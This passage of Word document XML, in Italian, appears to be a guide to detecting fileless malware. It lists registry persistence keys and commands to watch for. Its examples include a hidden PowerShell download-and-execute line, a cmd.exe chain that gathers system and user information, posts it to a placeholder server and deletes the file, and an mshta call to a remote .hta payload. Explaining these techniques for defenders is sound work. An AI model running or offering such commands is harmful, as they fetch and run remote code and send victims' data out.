              <w:t>Esecuzione di codice durante la fase iniziale del logon</w:t>
            </w:r>
            <w:r w:rsidR="007715AA">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> per tutti gli utenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="4D655FE5" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51701CAC" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CurrentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">\Image File </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> Options&lt;programma.exe&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5508CB20" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Hijacking</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> dell’esecuzione tramite valore “Debugger”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="288B0D8F" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="451CA2CB" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>CurrentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>\Windows\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>AppInit_DLLs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="769E0DF9" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Caricamento di DLL in più processi (iniezione di codice)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006900E6" w:rsidRPr="006900E6" w14:paraId="3C82287C" w14:textId="77777777" w:rsidTr="00FA2A37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7993E36A" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>HKCR&lt;estensione&gt;\shell\open\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>command</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="398849C0" w14:textId="77777777" w:rsidR="006900E6" w:rsidRPr="006900E6" w:rsidRDefault="006900E6" w:rsidP="006900E6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006900E6">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Esecuzione di codice tramite modifica dell’associazione file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C1C40D4" w14:textId="77777777" w:rsidR="006900E6" w:rsidRDefault="006900E6" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F73805" w14:textId="4F47780F" w:rsidR="008A58C2" w:rsidRPr="00E80709" w:rsidRDefault="00071949" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cosa scrivono i fileless malware sui registri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26609876" w14:textId="17C1A19F" w:rsidR="007715AA" w:rsidRPr="007715AA" w:rsidRDefault="00EE4510" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1 - </w:t>
      </w:r>
      <w:r w:rsidR="007715AA" w:rsidRPr="007715AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Comandi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91AB7F" w14:textId="3EF70AA8" w:rsidR="00145803" w:rsidRPr="007715AA" w:rsidRDefault="00145803" w:rsidP="00A82548">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">I comandi a cui prestare più </w:t>
      </w:r>
      <w:r w:rsidRPr="000D7F53">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>attenzione</w:t>
      </w:r>
      <w:r w:rsidRPr="00E97BB0">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sono quelli in cui compare:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1661AD91" w14:textId="6C2ADE7F" w:rsidR="00A82548" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>poweshell.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B3023D" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>È il framework d’elezione per il malware fileless poiché integra nativamente il .NET e le API di sistema. La sua potenza risiede nell’</w:t>
      </w:r>
      <w:r w:rsidR="00B3023D" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>esecuzione in-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B3023D" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>memory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B3023D" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: può scaricare, decifrare e avviare payload complessi direttamente nella RAM, senza che alcun file tocchi mai il disco (evitando così la scansione degli antivirus tradizionali).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5858A665" w14:textId="10381602" w:rsidR="00B3023D" w:rsidRPr="007B69A1" w:rsidRDefault="00B3023D" w:rsidP="00B3023D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B69A1">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Esempio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A430C00" w14:textId="7F6CFBF5" w:rsidR="00B3023D" w:rsidRPr="00B3023D" w:rsidRDefault="00B3023D" w:rsidP="00B3023D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>powershell.exe -NoP -W Hidden -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>Exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t xml:space="preserve"> "IEX (New-Object Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>).DownloadString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>('http://server-remoto/payload.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3207C245" w14:textId="77777777" w:rsidR="00A82548" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64261ABB" w14:textId="77777777" w:rsidR="00A82548" w:rsidRPr="00A82548" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: Viene utilizzato come interprete di comandi per avviare istruzioni concatenate tramite il parametro /c. Questo consente di eseguire una sequenza compatta di operazioni, come l’esfiltrazione di dati personali, il </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>download</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> di payload, la sua esecuzione e la successiva eliminazione di eventuali tracce. La capacità di concatenare comandi e terminare immediatamente il processo contribuisce all’occultamento dell’attività malevola.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF4854" w14:textId="77777777" w:rsidR="00B3023D" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Esempio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E63755" w14:textId="1EC6EF19" w:rsidR="00A82548" w:rsidRPr="00A82548" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>cmd.exe /c "(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; net user) &gt; %TEMP%\info.txt &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Invoke-WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Uri 'http://server-remoto/upload' -Method Post -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>InFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> '%TEMP%\info.txt'" &amp; del %TEMP%\info.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50522A38" w14:textId="77777777" w:rsidR="00A82548" w:rsidRPr="00A82548" w:rsidRDefault="001A1FCA" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mshta.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Gestisce le HTML Applications (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) e permette l’esecuzione di codice JavaScript o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>VBScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> da riga di comando o da URL remoto. Se richiamato tramite una chiave di registro, può eseguire uno script ospitato su un server esterno senza creare file locali, aggirando in alcuni casi i controlli di sicurezza del browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42229651" w14:textId="77777777" w:rsidR="00B3023D" w:rsidRDefault="00B951B4" w:rsidP="00B3023D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360" w:firstLine="348"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Esempio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67060F8D" w14:textId="2997DDBE" w:rsidR="00A82548" w:rsidRDefault="00B951B4" w:rsidP="00B3023D">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360" w:firstLine="348"/>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">mshta.exe   </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00A82548" w:rsidRPr="001952C4">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:highlight w:val="black"/>
          </w:rPr>
          <w:t>http://server-remoto/payload.hta</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5AA2C560" w14:textId="77777777" w:rsidR="00A82548" w:rsidRDefault="00A82548" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2419E139" w14:textId="69B89D45" w:rsidR="001A1FCA" w:rsidRPr="00A82548" w:rsidRDefault="00B951B4" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
